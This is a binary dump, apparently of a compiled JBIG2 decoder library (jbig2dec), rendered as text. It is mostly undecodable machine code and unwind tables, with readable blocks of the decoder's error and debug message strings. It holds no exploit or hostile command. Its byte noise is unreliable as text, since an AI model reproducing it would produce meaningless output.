  D��H�} �   H��H�D$(����I�D$H��H���	  �D$8�|$E�4$1�E1�L�l$L�|$8M��A��A��A�D$A�|$�I�\$�T$D��H��D�l$J��    H�H�D$ �	��H�I�D$J�4�H����  H�T$E1�D��H��A�   �9�����  I��E)�L9l$(u�L�l$L�|$8�   @ ����  E����  H�D$0    �6����H�D$hdH+%(   �T  �H��#  �   H��xH��1�[]A\A]A^A_���fD  A�H��[  �   H��1�E1����L��H�������|$ M�g0��   I���H�T$hdH+%(   ��  H��x[]A\A]A^A_ÐL��H��H���
��I��H���&gt;  H��H�����H��tfL�L$0H�T$@M��H��L��H��H�D$�
��L�T$��H�} L���	��L��H�������� ������   H��1�H��  �����,���A�H�D$�   H��H�y�  1����L�T$���f�     H�t$0H�} �&quot;	��M�g0���f�     A�H�o  H��1��   �W���R���f�A�A�   A��H��H�B  �   1�D�T$�)��D�T$E������A�H��n  H��1��   ������@ A�H��  H��1��   ��
��������     H�D$hdH+%(   �4  A�H��~  �   �����     �����H�&lt;�  1�1۾   H��L�l$L�|$8�y
���T$L�t$ ��t@ I�D$H�} H�4H������I9�u�H�} L��E1��������f�     H��  �����1�1۾   H��L�l$L�|$8�	
���D$L�t$ ��t�@ I�D$H�} H�4H�����I9�u�� A�H�^~  H��1��   E1��	���.���������   H��1�H�	  �	��H�} L��E1��-�������� ��AWI��AVAUATUH��SH��  dH�%(   H��$  1�H�~wKA�H�   H��1��   �2	��H��$  dH+%(   ��  H��  []A\A]A^A_�f�     H��$�   H��H�����I�v��sH��H�  H��A����A���t$DA���A��A��D�t$H��A��D�l$/D�t$8�D$0V��$�   �   P��$�   PD��$�   1�D��$�   A��q��H�� E��tE����  �D$(���k  M�oI�E�H�������H�{I��&quot;�4��H�{�D$ �&#039;��H�{�D$8�
��H�{�D$P����D$TA��I�������H�{&quot;�S	��H�{$f��$�   A���?	��H��f��$�   ��f��P��H��~  PA��fA��PA��PA��A��PAV��$�   @���P1�VD�L$x�   D�D$`A��|��H��@�|$&#039; ��  H�D$`    ��$�   ��$�   H���~��H�D$H����  I�GH��$�   A�G����  M�w ��M�l��f.�     I��M9���  A�6H�����H��t��P��?��u�H�@0H��t�H�D$xH�D$A��A��P�PH�x�����T$(���  H�D$p    H�D$x1ɺ   � �D$�� �ωЃ���9�w�|$h�L$H����  �t$HH�} �   HǄ$�       I���a��I��H����  �D$hE1�H�$E���w  L�|$D�|$8H�\$X�\$ �@ I�FL94$�F  I��D����H���*��K�D� H��u�L�|$D�L$8H��H��}  D�D$ �   A�����E��t$A�F�I�\� @ H�3H�����H��H��L9�u�H�} L���5��A�H��~  H��1��   �|��H�D$X    �ÐH�t$XH�} ���H�t$pH��������.  �|$&#039; �:  �EhH�T$H��D��$�   D��$�   H�4@��$�   H��Hup�������!  H�t$H��$�G���$����    A�A�   �   1�A�   H��{  H�������k���fD  �t$0H���\��H�} �   Lc�L�����H�D$`H���  H�|$`L��1��������fD  D�D$0A�A�   1�H��z  �   H���L������    A�H�^~  H��1��   �&#039;��H�D$p    H�D$X    �����fD  H�t$`H�} ������D  A�A�Ⱦ   H��H�k{  1�����H�D$X    ���T���L�|$H�\$X�D$&#039;�D$@A�����Ǆ$�       H��$�   Ƅ$�   ���$�   �ǋD$0fD��$�   ��$�   �D$(Ǆ$�   �����$�   H�D$pH��$�   ��H��&amp;H��&amp;��H�t$H�\$(��$�   @���/  �D$hH�L$H��$�   L��$�   H�T$(H��H��M�D� H�$���H�D$0    HǄ$�       ���  D�d$hE���a  �D$h��M�d� H�$M�t� H��$�   H�D$@H��L��I���    �|$&#039; L���   L�L$@H�L$L��H��H�T$(H+�$�   H�$�   ������J  H��t$8�r��t)1��D  H�I�H�zH�IH��H��0H9�u�H�C�I��I9���  H���o����    L�L$`H�L$0L��L��H���x ���H�t$H���)��H��{  A��   H��1�������H�t$`H�} �M���H�y  ��D�t$8�t$ H��D�����H�D$pH���  E��������$�   Hc|$P�D$X    1��D$h    �t$��$�   H��$�   �4$H��$�   H�l$xL��$�   I��H��$�   �ː�D$ ����   HcD$T�T$XE1�E1�D�d$hL�$�   H�L�d$E1�H�D$H�     �UD��HD$H��H�H��~1H�t$�H9�}%H�D$HD��H)ЋUH��H�H��~�VH9�|k �   ��D��L���&amp;��A��D4$Dl$D9d$ u��|$��|$h�&lt;$|$X9\$8�6���H��$�   L��$�   H��$�   ���f�     1ɉ�D��L������H�t$H���b��H�t$`H�} ���H��y  �&amp;���H�T$H�t$(H���V���H��$�   H����  H��$�   H���%���H�D$0H���  �D$hL�L$`L��H��H��$�   H�L$0M�D� H��H�$�������A�H��v  �   H���n����7���D�d$ H�} �   L���c���H�D$XH����  �D$8D�\$ E1�H�D$(E����   L�l$H�\$(L�|$@L�l$XM��M����    I��M9��`  H�} �   H��E�����K�D� H��u�L�|$@D�D$ �   H��D�D$8H��w  L�l$A����E��t,A�D$�L�d$XI��fD  H�3H�} �,���H��H��I9�u�H�t$XH�} ����H�D$X    �|$&#039; ��  �|$H��t+�D$hM��I�\�f.�     I�4$H��I�����L9�u�H�} L�����H�|$X �~����\$8����  �D$&lt;H�$    L�|$hL�|$x�����D$&lt;��$�   Ǆ$�       �D$0��$�   Ǆ$�       �D$8��H�\$XH�H��$�   �D$ ��H�D�1�H�D$@�t$ ����   HcD$PL�t$XE1�E1䋔$�   HЋ�$�   H�D$HcD$TH�H�D$(�B I�W��D�L$&lt;E��H�t$��H��H���.�������   Dd$8Dl$0I��L9t$@tiL�T$(D��H�$D��H\$I)�I�H��I��D�D��D9D$w�H�D$h�   H��L�T$HH�7v  �1�����D$L�T$H���\���@ ��H�$�t$0�|$8�$�   �$�   H�$H9�$�   ���L�|$h�L$ ��������     D�l$ L�t$XE1� K�4�H�} I������E9�w�����D  L�|$h�   H��1�H��u  A��������H��t  A��   H��1����H�D$X    �~���A�H��s  �   H������H�D$X    H�D$0    H�t$0H�} �P���H��$�   H���P����=���L�|$@1�L�l$H�l$@L�d$X��L��$�    D�D$8E��t{H�D$    I�$�H�D$D�T$HE1�E1�fD�BL�4 ��E��t;L��M��I���    K�&lt;��ډ�����I�$D����fB*L��I��H9$u�M��H�D$H�D$H9D$(u���I��9l$ �j���H�l$@L��$�   �g���H�qs  ���D�D$HA��   H��H�er  1��������A�H��r  �   H�����H�D$X    ���A�H�@^  H��1��   �c���������1�������D�D$ A��   H��H�As  1��2�������ff.�     f���AWAVE��AUA��ATUH��SH��H��9��   D�F����1�A��9F��   A��D��H�vH�?I�׹   �X���I��H���L  H�C�CD9�s$�KL��H)�H��A��@�H��@��I�&lt;���D�kI��H��L��[]A\A]A^A_� �։����I��H����   D��H��H�����E1�1�A�   H��L��H���4�����xhH�sH�} ����A�$H�} L��A�D$�CA�D$�CI�D$I��H�C����k���A�ɺ�����   1�H�:s  E1������H���D  ������   H��1�H��s  ���L��H��E1��������f.�     ������   H��1�H�&quot;s  �u������������   H��1�H�F\  �U���������H��H���                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   jbig2 decoder FATAL ERROR: %s  (segment 0x%02x) failed to renormalize decoder failed to decode IAx S failed to decode IAx V bit %d failed to decode IAIDx code failed to allocate result invalid Huffman Table range segment too short failed to allocate segment segment number too large huffman table not found (%d) too many pages in jbig2 image failed to reallocate pages extra data in segment 	maximum stripe size: %d unsupported image coordinates huffman coded text region   read runcode%d length %d failed to read huffman code OOB decoding huffman code failed to decode strip T failed to decode delta T failed to decode data text region has SBDSOFFSET %d unsupported GBTEMPLATE (%d) gbat[%d] = %d invalid HCHEIGHT value failed to decode DW failed to allocate image failed to decode text region missing glyph %d/%d segment flags = %02x gbat: %d, %d unable to add result to page No restriction All JBIG2 capabilities Arithmetic only Maximum compression No skip mask used 10-pixel template only Huffman only MMR only Not available Low complexity Unknown Segment too short Supported profile: 0x%08x   Requirements: %s   Generic region coding: %s   Halftone region coding: %s   Numerical data: %s ignoring ASCII comment ignoring UCS-2 comment unknown segment type %d not a JBIG2 file header garbage beyond end of file �JB2

 failed to parse segment end of page %d failed to complete page        failed to generate error string failed to read next word of stream because stream or output missing     failed to read from underlying stream during arithmetic decoding        failed to read beyond end of underlying stream during arithmetic decoding       failed to check for marker code due to failure in underlying stream during arithmetic decoding  failed to read end of possible terminating marker code, assuming terminating marker code        failed to find terminating marker code before end of underlying stream, assuming terminating marker code        failed to read byte from compressed data stream failed to allocate word stream  incompatible jbig2dec header (%d.%d) and library (%d.%d) versions       failed to allocate initial context      failed to allocate initial segments     failed to allocated initial pages       failed to allocate arithmetic coding state      failed to initialize underlying stream of arithmetic decoder    failed to read first byte from underlying stream when initializing arithmetic decoder   failed to read second byte from underlying stream when initializing arithmetic decoder  failed to determine probability estimate because index out of range     failed to allocate arithmetic integer coding state      failed to decode IAx decision bit 0     failed to decode IAx decision bit 1     failed to decode IAx decision bit 2     failed to decode IAx decision bit 3     failed to decode IAx decision bit 4     requested IAID arithmetic coding state size too large   failed to allocate IAID arithmetic coding state failed to allocate symbol ID in IAID arithmetic coding state    failed to read first huffman word       failed to read second huffman word      failed to allocate new huffman coding state     failed to read next huffman word when skipping  failed to get first huffman word after advancing        failed to get second huffman word after advancing       end of jbig2 buffer reached at offset %d        failed to get next huffman word end of Jbig2WordStream reached at offset %d     encountered unpopulated huffman table entry     failed to allocate huffman histogram    constructing huffman table log size %d  failed to allocate result entries       ran off the end of the entries table! (%d &gt;= %d)        failed to allocate Huffman Table Parameter      failed to allocate huffman table lines  failed to reallocate huffman table lines        attempted to parse segment header with insufficient data, asking for more data  failed to allocate referred to segments segment %d refers to segment %d segment %d is associated with page %d   end of stripe segment with non-positive end row advance (new end row %d vs current end row %d)  end of stripe: advancing end row from %u to %u  failed to allocate new empty symbol dictionary  failed to allocate glyphs for new empty symbol dictionary       failed to allocate referred list of symbol dictionaries counted %d symbol dictionaries but built a list with %d.        page %d released by the client  failed to release unknown page  unexpected page info segment, marking previous page finished    page segment indicates use of color segments (NYI)      page %d image is %dx%d (unknown res)    page %d image is %dx%d (%d ppm) page %d image is %dx%d (%dx%d ppm)      failed to allocate buffer for page image        allocated %dx%d page image (%d bytes)   height is unspecified but page is not marked as striped, assuming striped with maximum strip size       page info possibly missing, no image defined    adding image at coordinate would grow page out of bounds        growing page buffer to %u rows to accommodate new stripe        unable to resize image to accommodate new stripe        failed to compose image with page       page %d returned with no associated image       page %d returned to the client  failed to allocate new symbol dictionary        symbol list contains %d glyphs in %d dictionaries       failed to allocate text region  failed to read huffman runcode lengths  OOB decoding huffman runcode lengths    error constructing symbol ID runcode table      failed to allocate memory when reading symbol ID huffman table  error reading symbol ID huffman table   OOB decoding symbol ID huffman table    symbol ID huffman table out of range    error decoding symbol ID table: run length with no antecedent     read runcode%d at index %d (length %d range %d)       runlength extends %d entries beyond the end of symbol ID table  failed to skip to next byte when building huffman table failed to construct symbol ID huffman table     OOB obtained when decoding strip T      OOB obtained when decoding delta T      failed to decode strip symbol S-difference      OOB obtained when decoding strip symbol S-difference    too many NINSTANCES (%d) decoded        failed to decode symbol instance S coordinate   OOB obtained when decoding symbol instance S coordinate signals end of strip with T value %d    failed to decode symbol instance T coordinate   OOB obtained when decoding symbol instance T coordinate failed to obtain symbol instance symbol ID      OOB obtained when decoding symbol instance symbol ID    ignoring out of range symbol ID (%d/%d) missing glyph (%d/%d), ignoring failed to decode symbol bitmap refinement indicator     OOB obtained when decoding symbol bitmap refinement indicator   OOB obtained when decoding symbol instance refinement data      reference image dimensions negative     failed to allocate reference image      failed to decode refinement region      failed to advance after huffman decoding refinement region      failed to compose symbol instance symbol bitmap into picture    region segment flags indicate use of colored bitmap (NYI)       text region header flags 0x%04x reserved bit 15 of text region huffman flags is not zero        custom FS huffman table not found (%d)  text region specified invalid FS huffman table  failed to allocate text region specified FS huffman table       custom DS huffman table not found (%d)  failed to allocate text region specified DS huffman table       custom DT huffman table not found (%d)  failed to allocate text region specified DT huffman table       custom RDW huffman table not found (%d) text region specified invalid RDW huffman table failed to allocate text region specified RDW huffman table      custom RDH huffman table not found (%d) text region specified invalid RDH huffman table failed to allocate text region specified RDH huffman table      custom RDX huffman table not found (%d) text region specified invalid RDX huffman table failed to allocate text region specified RDX huffman table      custom RDY huffman table not found (%d) text region specified invalid RDY huffman table failed to allocate text region specified RDY huffman table      custom RSIZE huffman table not found (%d)       failed to allocate text region specified RSIZE huffman table    text region huffman flags bit 15 is set, contrary to spec       text region: %d x %d @ (%d,%d) %d symbols       text region refers to no symbol dictionaries    unable to retrieve symbol dictionaries! previous parsing error? unable to find first referenced symbol dictionary       unable to find all referenced symbol dictionaries       could not allocate arithmetic decoder state     failed to allocate text region image    failed to allocate word stream when handling text region image  failed to allocate arithmetic coding context when handling text region image    failed to allocate text region image data       failed to decode text region image data composing %dx%d decoded text region onto page at (%d, %d)       unable to add text region to page       adaptive template pixel is out of field failed to decode arithmetic code when handling generic template0 TPGDON1        failed to decode arithmetic code when handling generic template0 TPGDON2        failed to decode arithmetic code when handling generic template1 TPGDON1        failed to decode arithmetic code when handling generic template1 TPGDON2        failed to decode arithmetic code when handling generic template2 TPGDON1        failed to decode arithmetic code when handling generic template2 TPGDON2        failed to decode arithmetic code when handling generic template3 TPGDON1        failed to decode arithmetic code when handling generic template3 TPGDON2        failed to decode arithmetic code when handling generic template0 optimized      failed to decode arithmetic code when handling generic template0 unoptimized    failed to decode arithmetic code when handling generic template1 optimized      failed to decode arithmetic code when handling generic template1 unoptimized    failed to decode arithmetic code when handling generic template2 optimized      failed to decode arithmetic code when handling generic template2 unoptimized    failed to decode arithmetic code when handling generic template3 optimized      failed to decode arithmetic code when handling generic template3 unoptimized    unsupported generic region (MMR=%d, GBTEMPLATE=%d)      custom DH huffman table not found (%d)  symbol dictionary specified invalid huffman table       failed to allocate DH huffman table     custom DW huffman table not found (%d)  failed to allocate DW huffman table     custom BMSIZE huffman table not found (%d)      failed to allocate BMSIZE huffman table custom REFAGG huffman table not found (%d)      failed to allocate REFAGG huffman table SDHUFF is zero, but contrary to spec SDHUFFDH is not.   SDHUFF is zero, but contrary to spec SDHUFFDW is not.   symbol dictionary, flags=%04x, %u exported syms, %u new syms    failed to allocate dicts in symbol dictionary   failed to allocate symbol array in symbol dictionary    segment marks bitmap coding context as used (NYI)       failed to allocate arithmetic decoder states for generic regions        failed to allocate arithmetic decoder states for generic refinement regions     failed to allocate word stream when decoding symbol dictionary  failed to allocate arithmetic coding state when decoding symbol dictionary      huffman coded symbol dictionary failed to allocate for symbol bitmap    failed to allocate symbol widths (%u)   out of memory creating text region huffman decoder entries      failed to allocate symbol bitmap        failed to allocate text region arithmetic decoder contexts      failed to allocate text region arith decoder contexts   failed to allocate new symbols (%u)     Out of memory allocating dictionary array       out of memory allocating symbol dictionary      failed to decode height class delta     OOB decoding height class delta decoding height class %d with %d syms decoded   OOB when decoding DW signals end of height class %d     no OOB signaling end of height class %d, continuing     DW value (%d) would make SYMWIDTH (%u) negative at symbol %u    DW value (%d) would make SYMWIDTH (%u) too large at symbol %u   SYMWIDTH value (%u) would make TOTWIDTH (%u) too large at symbol %u     failed to decode generic region failed to decode number of symbols in aggregate glyph   OOB in number of symbols in aggregate glyph     invalid number of symbols in aggregate glyph    aggregate symbol coding (%d instances)  failed to allocate symbol image OOB in single refinement/aggregate coded symbol data    refinement references unknown symbol %d symbol is a refinement of ID %d with the refinement applied at (%d,%d)  failed to advance after huffman decoding in refinement region   decoded symbol %u of %u (%ux%u) error decoding size of collective bitmap        OOB obtained when decoding size of collective bitmap    failed to skip to next byte when decoding collective bitmap     failed to allocate collective bitmap image      not enough data for decoding uncompressed (%d/%li)      reading %dx%d uncompressed bitmap for %d symbols (%li bytes)    not enough data for decoding (%li/%li)  reading %dx%d collective bitmap for %d symbols (%li bytes)      failed to decode MMR-coded generic region       failed to advance after huffman decoding MMR bitmap image       failed to copy the collective bitmap into symbol dictionary     failed to compose image into glyph      failed to allocate symbols exported from symbols dictionary     failed to decode runlength for exported symbols OOB when decoding runlength for exported symbols        runlength too small in export symbol table (%u == 0 i = %u limit = %u)  exporting more symbols than available (%u &gt; %u), capping        exporting more symbols than may be exported (%u &gt; %u), capping  segment marks bitmap coding context as retained (NYI)   generic region: %u x %u @ (%u, %u), flags = %02x        segment contains more rows than stated in header        MMR is 1, but GBTEMPLATE is not 0       segment uses 12 adaptive template pixels (NYI)  ignoring %u x %u region at (%u, %u) outside of stripe at row %u covering %u rows, on page of height %u  ignoring %u x %u region at (%u, %u) outside of page of height %u        nothing remains of region, ignoring     failed to allocate generic image        allocated %d x %d image buffer for region decode results        failed to allocate arithmetic decoder states when handling immediate generic region     failed to allocated word stream when handling immediate generic region  failed to allocate arithmetic coding state when handling immediate generic region       failed to decode immediate generic region       Arithmetic only; any template used      Arithmetic only; only 10-pixel and 13-pixel templates   Medium complexity and medium compression        Low complexity with progressive lossless capability     segment %d, flags=%x, type=%d, data_length=%ld  unhandled segment type &#039;intermediate generic region&#039; (NYI)      segment too short to store profile        Refinement region coding: %s  unhandled segment type &#039;color palette&#039; (NYI)    extension segment is marked &#039;necessary&#039; but not &#039;reserved&#039; contrary to spec     unhandled necessary extension segment type 0x%08x       unhandled non-necessary extension segment, skipping     failed to allocate buffer when reading data     read data causes buffer to grow too large       failed to allocate bigger buffer when reading data      file header indicates use of 12 adaptive template pixels (NYI)  file header indicates use of colored region segments (NYI)      reserved bits (2-7) of file header flags are not zero (0x%02x)  file header indicates a single page document    file header indicates a %d page document        file header indicates sequential organization   file header indicates random-access organization        too many segments in jbig2 image        failed to allocate space for more segments      unknown length determined to be %lu     failed to decode; treating as end of file       file has an invalid segment data length; trying to decode using the available data      page has no image, cannot be completed  end of page marker for page %d doesn&#039;t match current page number %d                     �Z���Y���Y���Y�� Z���Y�� Z�� Z���Y���Y���Y���Y���Y���Y���Y���Y��[���Y���Y���Y��@Z���Y��@Z��@Z���Y���Y���Y���Y���Y���Y���Y���Y���Y���Y���Y���Y���\���Y���Z���Z��`Z���Y��`Z��`Z���Y���Y���Y���Y�� \��0[��P[��p[���[���Z���Z���Y���Y���Y���Y���Y���Y���Y��@\���]���\���[��d]��4]��]���_���^��_���^��_��l`��                           ����       ����                                       ����                                                                                                                           -         M           ����       �                                                                                           
                                             )          I           ����                              ��       ����       ����       ����      ����                                                       F         f         �         �         F     	   F     
   F        F         ��       F                       ��	      �      ����	      ����      ����      ����      ����                                          &#039;         +         K         �                      	             	       ��	                                               	    ���       ���       ���      ����      ����      ��                          @         �               	         
             ����                                                                           	                                             -         M           ����       �                                 �	      ����      ����	       ����       ����       ����                                                               &amp;         F         �                 �     
   �  	       �	       �                    
    ���   	    ���       ���       ���      ����      ����      ��                �               	         
             ����                                        ��      ����      ����       ����       ����                                                       	          ��                                                 ����                   ���                                                        ����       K                                                                                           ����       K                    ���                                                        ���       L                                                           ����       L               V�4�
!!#$V�T	H80$V�TQH840($&quot;�
�	?�&gt;!&gt;A�!A� I %  	    V  jbig2_mmr.c x % 16 == 0 x % 32 == 0 x % 8 == 0 w - x &gt;= 8 P4
%d %d
 wb zeroes code in MMR-coded data failed to decode white H run failed to decode black H run ignoring negative black H run ignoring negative white H run ignoring negative P run ignoring negative V(0) run ignoring negative VR(1) run ignoring negative VR(2) run ignoring negative VR(3) run ignoring negative VL(1) run ignoring negative VL(2) run ignoring negative VL(3) run failed to decode mmr line not a binary pbm file.
 pbm parsing error
 unexpected end of pbm file.
 rb  TPGRON  GRTEMPLATE segment flags = %02x %s%s params-&gt;GRAYMAX out of range reserved flag bits non-zero failed to allocate skip image failed to reallocate image          �e���e��f���d���e��|���l���l���l���l���l���l���l���l���l�����������l���l�������l���l���l���l���l���l���l���l���l���l���l���l���l���l���l���l���l���l�������l���l���L���                        �  �  �    
        	  	                                                                                                                                                                                                                                              �� �� ��  ��  ��  ��  ��  ��  ��  ��  ��  ��  ��  ��  ��  ��     �   @ � �  	 @ @ � � @	 �	 �	  
                 4  4  � �   @ 7  7  8  8    @ � � ;  ;  &lt;  &lt;    @                 � � @ @ � � � �   @ 5  5  6  6  � �   @ � � @  @  @  @  @  @  @  @                                      2  3  ,  -  .  /  9  :  =                    0  1  &gt;  ?         !  (  )                                                      �  �                  &quot;  #  $  %  &amp;  &#039;      *  +                     -  .          /  0              !  &quot;  #  $  %  &amp;                           5  6      &#039;  (  )  *  +  ,          =  &gt;  ?     @ � 
  
  
  
  
  
  
  
                      ;  &lt;   	 &quot;	         1  2  3  4      7  8  9  :  �  �  �  �  � � � � �   $	 � @ &amp;	 (	 *	 ,	 .	                                                                     �  �  �  �  �  �  �  �                  	  	  	  	  	  	  	  	                                                                                                  @  @  @  @  @  @  @  @                                                                  �� �� ��  ��  ��  ��  ��  ��  ��  ��  ��  ��  ��  ��  ��  ��     �   @ � �  	 @ @ � � @	 �	 �	  
 �   @ � �   @ � �   @ � �   @ �  �����?jbig2_find_changing_element     unable to open &#039;%s&#039; for writing invalid code detected in MMR-coded data uncompressed code in MMR-coded data     failed to decode halftone mmr line      decoding generic refinement region with offset %d,%x, GRTEMPLATE=%d, TPGRON=%d  failed to decode arithmetic code when handling refinement TPGRON1       failed to decode arithmetic code when handling refinement template0     failed to create zero sized image       integer multiplication overflow (stride=%u, height=%u)  failed to allocate image data buffer (stride=%u, height=%u)     end-of-file parsing pbm header
 failed to read pbm image dimensions
    failed to allocate %dx%d image for pbm file
    unable to open &#039;%s&#039; for reading
        reserved segment flag bits are non-zero grat1: (%d, %d) grat2: (%d, %d) failed to find referred to segment %d   reference page bitmap has no decoded image      failed to allocate refinement image     failed to allocate arithmetic decoder state for generic refinement regions      failed to allocate word stream when handling refinement region  failed to allocate arithmetic coding state when handling refinement region      composing %dx%d decoded refinement region onto page at (%d, %d) unable to add refinement region to page failed to find reference bitmap found reference bitmap in segment %d    pattern dictionary, flags=%02x, %d grays (%dx%d cell)   HDTEMPLATE is %d when HDMMR is %d, contrary to spec     failed to allocate arithmetic coding state when handling pattern dictionary     failed to allocate collective bitmap for halftone dictionary    failed to allocate arithmetic coding state when handling halftone dictionary    failed to allocate word stream when handling halftone dictionary        failed to allocate pattern in collective bitmap dictionary      failed to allocate pattern element image        failed to compose image into collective bitmap dictionary       failed to allocate collective bitmap dictionary halftone region: %u x %u @ (%u, %u), flags = %02x       HTEMPLATE is %d when HMMR is %d, contrary to spec       HENABLESKIP is %d when HMMR is %d, contrary to spec     grid %d x %d @ (%d.%d,%d.%d) vector (%d.%d,%d.%d)       failed to allocate arithmetic decoder states in halftone region failed to allocate halftone image       HBPP is larger than supported (%u)      failed to allocate %d bytes for GSPLANES        failed to allocate %dx%d image for GSPLANES     failed to allocate word stream when decoding gray scale image   failed to allocate arithmetic coding state when decoding gray scale image       error decoding GSPLANES for halftone image      failed to decode GSPLANES for halftone image    failed to allocate GSVALS: %d bytes     unable to acquire gray-scale image, skipping halftone image     gray-scale index %d out of range, using largest index   failed to compose pattern with gray-scale image failed to decode halftone region        unable to add halftone region to page   no pattern dictionary found, skipping halftone image    integer multiplication overflow during resize (stride=%u, height=%u)    failed to allocate resized image        failed to compose image buffers when resizing   ;  �   {��0   ���X  ����p  0����  @����  P����  `����  ���  ���  0���$  `���`   ���t  @����  �����  Ѝ��  ��  ���,   ���@  0���T  �����  �����  @���  P���  ����,  ��t  ����  �����  0���T  @���h   ����  И��	  ���D	   ���X	   ����	  �����	  `����	  p����	  p���&lt;
   ����
  ����
  P���   ����p  �����  ��  `����   ���H  `���p  ����  Ю���  �  ����X  �����  �����  `����  б��  ����T  P����  `����  ����4   ����  �����  ����&lt;  ����   ��@  ����  �-���  4���  �9��   �A���  `B���  �B���  `C��   D��D   I���   L���  PL���  pL��  �O���  �O���  P���  �Q��(  �R��p  0S���  �S���  �S���   T���  T��    T��  0T��(  @T��&lt;  PT��P  `T��d  pT��x  �T���  �T���  �T���  �T���  �T���  �T���  �T��  �T��   U��,  U��@   U��T  0U��h  @U��|  PU���  `U���  pU���  �U���  �U���  �U���  �U��  �U��  �U��0  �V���  �]���  �_��H  �a���  �i��   k��t  @k���  `k���  �k���  �n��0  o��\  0u��  �{���  ��              zR x�  $      �v���   FJw� ?:*3$&quot;       D   �|���              \   (����    B�J�lB     �   ����          �   ����          �   ����       (   �   ����{    R�M�L i
A�B�I   �   ܃��&quot;          �   ����       8     ���+   F�E�D �A(�J�
�
(F ABBD   L  �����       D   `  ����   B�A�D ��
ABH}
ABH�
IIO  0   �  |���y    A�D�G @
CAHDMK   �  ȇ��          �  ć��            ����%            ܇��	          ,  ؇��       8   @  ԇ��u    F�J�A �D(�L0i
(D ABBE     |  ���       \   �  ���v   F�B�B �H(�A0�A8�J�
8D0A(B BBBFu�B�N�A�     �  4���            0���3       D     \���P   F�F�D ��
ABDn
ABGn
ABG   4   `  d���&quot;   F�D�G t
DBEe
FBK(   �  \����    F�K�G B
DBH x   �  �����   F�E�B �B(�H0�G8�D`�
8A0C(B BBBD
8K0F(B BBBLD8L0H(G DBB     @  Ԏ��       L   T  Ў���    F�I�A �D(�D0[
(D ABBDn
(A DBBI   \   �  `����    F�B�B �B(�A0�A8�DPL
8M0F(G BBBE\8C0A(B BBB(     ����9    J�D�G SD�A�      0  ď��       8   D  �����    F�F�D �l
ABAm
ABH      �  d����    E�~
EN    �  ��    J�u
AX
H    �  ����       L   �  |���    F�A�A �~
ABGR
ABK]
FBKLCL  d   (  ,����   F�B�B �E(�A0�A8�D`�
8D0A(B BBBId
8H0H(G BBBO   L   �  T���   F�G�B �B(�A0�A8�D�
8A0A(B BBBA   (   �  ���9    J�D�G SD�A�   L     (���)   F�B�B �B(�A0�A8�D��
8A0A(B BBBD   (   \  ���9    J�D�G SD�A�   H   �  ���$   F�B�E �B(�A0�A8�Dp_
8D0A(B BBBG   �   ���o       H   �  \����    F�E�E �D(�A0�m
(C BBBEA(E BBB$   4  ����R    E�D�J |AA H   \  ���    F�B�A �D(�G0P
(C ABBDf(J FBB  8   �  L����    F�G�A �D(�K0H
(D ABBB    �  С��       H   �  ܡ���    F�B�A �A(�D0W
(D ABBBD(D DBB  H   D	   ���   F�E�B �B(�A0�D8�D@�
8D0A(B BBBH    �	  ��       4   �	  ��    N�D�D I
C�M�IDM�K�(   �	  h���a    K�D�D �}�D�B�4   
  �����    J�D�G y
D�A�M`��H ��4   @
  4����    F�A�A ��
ABCDAE     x
  ����	       �   �
  ����&gt;   F�E�B �B(�D0�A8�DP�XD`FhCpPPIXX`R8C0A(B BBBHPd
8F0A(B BBBE�XI`MXBPFXK`MXAP `      d���S   F�D�E �B(�A0�A8�DPH
8C0A(B BBBEU
8F0A(B BBBL T   �  `����    Q�I�A �D(�F0_
(C ABBDo
(G� A�B�B�E`���� H   �  ȩ���    F�E�B �B(�A0�A8�D`�
8A0A(B BBBA l   (  |����   F�B�B �E(�A0�A8�J��
8A0A(B BBBH��U�U�A���N�V�E��   �  ��Z   F�J�B �B(�A0�D8�G���L�L�E�U�1�G�M�B�A�D�X�y�E�V�E�u
8D0A(B BBBK   �   ,  ����&amp;   F�E�E �E(�A0�A8�G��
8C0A(B BBBJ2
8F0A(B BBBO
8C0A(B BBBAm	
8C0A(B BBBG   �  ��&#039;   F�E�E �B(�A0�A8�G�M
8F0F(B BBBL��^�P�D�F�M�i�A�x
8A0A(B BBBE��T�P�C�-�P�E�D�G�G�h�\�J�W�B�	�D�e�B���T�a�B���Z�K�D�G
�D�J�
�K�M   �   �  ���   F�B�B �B(�A0�D8�G�}�W�E�E�]��
8A0A(B BBBEZ
8J0F(B BBBN��G�A�H�F�G�U���P�A�G�U� x  �  d ���   F�I�B �E(�D0�D8�DpJxO�MxApH
8C0A(B BBBCD
8J0A(B BBBID
8J0A(B BBBID
8J0A(B BBBID
8J0A(B BBBID
8J0A(B BBBIS
8F0A(B BBBND
8J0A(B BBBID
8J0A(B BBBID
8J0A(B BBBID
8J0A(B BBBI�
8J0A(B BBBIO
8G0H(G DBBK  d     �$���   F�B�E �B(�A0�D8�Gpg
8F0A(B BBBOr
8A0A(B BBBD  0   t   ,���    E�D�D }
CABmFA8   �  �,���    F�A�D �_
CBAFHI         �  �,��f       4   �  L-���    E�K�K �X
ABJQAB  D   0  �-���   B�H�B �E(�D0�A8��
0A(B BBBG  (   x  l2���   �Ud^
B A 4   �  @5��I    B�D�D �g
ABDAIB      �  X5��       �   �  d5��   z�D�G �B(�A0�A8�MHDPAXI`BhApExIHD
8C0A(B BBBK�
PNZ
PFR
PNR
PNBPAXK`BhApExIHK
PFB
PFB
PFBPB������      �  �7��$          �  �7��C       H   �  ,8���   F�H�E �B(�G0�A8�GPg8D0A(E BBB   D     �9��-   F�F�H �B(�A0�C8�LP�8D0A(E BBB   \  h:��C       $   p  �:��O    F�M�L jCB (   �  �:��m    F�E�K �j
BBA   �  ;��          �  ;��          �  ;��             ;��             ;��          (  �:��          &lt;  �:��          P  �:��          d  �:��          x  �:��          �  �:��          �  �:��          �  �:��          �  �:��          �  �:��          �  �:��            �:��	            �:��	          ,  �:��	          @  �:��	          T  �:��          h  �:��          |  �:��          �  �:��          �  �:��          �  �:��          �  �:��          �  �:��          �  �:��            �:��       \     �:��
   B�K�E �H(�G0�F8�N@~
8K0F(B BBBLd8D0A(B BBBd   |  H;���   B�E�H �B(�D0�D8�F`�
8C0A(B BBBG�
8K0F(B BBBE  L   �  �A���   F�G�B �B(�D0�A8�D�3
